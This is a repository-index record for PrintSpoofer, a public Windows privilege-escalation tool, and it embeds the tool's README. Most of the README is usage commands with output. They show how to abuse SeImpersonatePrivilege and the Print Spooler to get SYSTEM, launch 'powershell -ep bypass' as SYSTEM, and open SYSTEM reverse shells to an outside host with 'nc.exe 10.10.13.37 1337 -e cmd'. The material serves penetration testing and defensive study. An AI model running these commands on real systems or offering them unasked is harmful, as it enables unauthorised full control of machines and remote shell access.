{"id":13573844,"url":"https://github.com/itm4n/PrintSpoofer","last_synced_at":"2025-04-04T12:31:45.526Z","repository":{"id":41419068,"uuid":"259576481","full_name":"itm4n/PrintSpoofer","owner":"itm4n","description":"Abusing impersonation privileges through the \"Printer Bug\"","archived":true,"fork":false,"pushed_at":"2020-09-10T17:49:41.000Z","size":84,"stargazers_count":1915,"open_issues_count":5,"forks_count":334,"subscribers_count":20,"default_branch":"master","last_synced_at":"2025-01-25T05:31:54.927Z","etag":null,"topics":["pentest-tool","windows-privilege-escalation"],"latest_commit_sha":null,"homepage":"https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/itm4n.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-04-28T08:26:29.000Z","updated_at":"2025-01-25T02:13:40.000Z","dependencies_parsed_at":"2022-08-10T02:07:40.646Z","dependency_job_id":null,"html_url":"https://github.com/itm4n/PrintSpoofer","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/itm4n%2FPrintSpoofer","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/itm4n%2FPrintSpoofer/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/itm4n%2FPrintSpoofer/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/itm4n%2FPrintSpoofer/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/itm4n","download_url":"https://codeload.github.com/itm4n/PrintSpoofer/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247179913,"owners_count":20897117,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["pentest-tool","windows-privilege-escalation"],"created_at":"2024-08-01T15:00:41.997Z","updated_at":"2025-04-04T12:31:40.516Z","avatar_url":"https://github.com/itm4n.png","language":"C","funding_links":[],"categories":["C","C (286)"],"sub_categories":[],"readme":"# PrintSpoofer\n\nFrom LOCAL/NETWORK SERVICE to SYSTEM by abusing `SeImpersonatePrivilege` on Windows 10 and Server 2016/2019.\n\nFor more information: [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/).\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"demo.gif\"\u003e\n\u003c/p\u003e\n\n## Usage\n\nYou can check the help message using the `-h` option.\n\n```txt\nC:\\TOOLS\u003ePrintSpoofer.exe -h\n\nPrintSpoofer v0.1 (by @itm4n)\n\n  Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print\n  Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()\n\nArguments:\n  -c \u003cCMD\u003e    Execute the command *CMD*\n  -i          Interact with the new process in the current command prompt (default is non-interactive)\n  -d \u003cID\u003e     Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)\n  -h          That's me :)\n\nExamples:\n  - Run PowerShell as SYSTEM in the current console\n      PrintSpoofer.exe -i -c powershell.exe\n  - Spawn a SYSTEM command prompt on the desktop of the session 1\n      PrintSpoofer.exe -d 1 -c cmd.exe\n  - Get a SYSTEM reverse shell\n      PrintSpoofer.exe -c \"c:\\Temp\\nc.exe 10.10.13.37 1337 -e cmd\"\n```\n\n### Usage 1: Spawn a SYSTEM process and interact with it\n\nIf you have an __interactive__ shell, you can create a new SYSTEM process in your current console.\n\n__Use case__: bind shell, reverse shell, `psexec.py`, etc.\n\n```txt\nC:\\TOOLS\u003ePrintSpoofer.exe -i -c cmd\n[+] Found privilege: SeImpersonatePrivilege\n[+] Named pipe listening...\n[+] CreateProcessAsUser() OK\nMicrosoft Windows [Version 10.0.19613.1000]\n(c) 2020 Microsoft Corporation. All rights reserved.\n\nC:\\WINDOWS\\system32\u003ewhoami\nnt authority\\system\n```\n\n### Usage 2: Spawn a SYSTEM process and exit\n\nIf you can __execute commands__ but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.\n\n__Use case__: WinRM, WebShell, `wmiexec.py`, `smbexec.py`, etc.\n\nCreate a reverse shell:\n\n```txt\nC:\\TOOLS\u003ePrintSpoofer.exe -c \"C:\\TOOLS\\nc.exe 10.10.13.37 1337 -e cmd\"\n[+] Found privilege: SeImpersonatePrivilege\n[+] Named pipe listening...\n[+] CreateProcessAsUser() OK\n```\n\nNetcat listener:\n\n```txt\nC:\\TOOLS\u003enc.exe -l -p 1337\nMicrosoft Windows [Version 10.0.19613.1000]\n(c) 2020 Microsoft Corporation. All rights reserved.\n\nC:\\WINDOWS\\system32\u003ewhoami\nnt authority\\system\n```\n\n### Usage 3: Spawn a SYSTEM process on a desktop\n\nIf you are __logged on locally or via RDP__ (including VDI), you can spawn a SYSTEM command prompt on your desktop. First, check your session ID with the command `qwinsta` and then specify this value with the option `-d`.\n\n__Use case__: Terminal Session (RDP), VDI\n\n```txt\nC:\\TOOLS\u003eqwinsta\n SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE\n services                                    0  Disc\n console           Administrator             1  Active\n\u003erdp-tcp#3         lab-user                  3  Active\n rdp-tcp                                 65536  Listen\n\nC:\\TOOLS\u003ePrintSpoofer.exe -d 3 -c \"powershell -ep bypass\"\n[+] Found privilege: SeImpersonatePrivilege\n[+] Named pipe listening...\n[+] CreateProcessAsUser() OK\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fitm4n%2FPrintSpoofer","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fitm4n%2FPrintSpoofer","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fitm4n%2FPrintSpoofer/lists"}